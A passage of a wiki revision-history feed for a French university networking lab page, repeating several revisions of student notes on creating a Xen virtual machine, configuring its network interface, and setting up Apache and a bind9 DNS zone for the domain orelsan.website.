&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur HTTP &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur DNS &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Configuration de notre nom de domaine&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt; Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35632</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35632"/>
				<updated>2016-12-05T16:24:09Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur HTTP &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur DNS &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Configuration de notre nom de domaine&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35631</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35631"/>
				<updated>2016-12-05T16:01:34Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur HTTP &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;b&amp;gt; Installation du serveur DNS &amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;b&amp;gt;Configuration de notre nom de domaine&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35630</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35630"/>
				<updated>2016-12-05T15:57:10Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
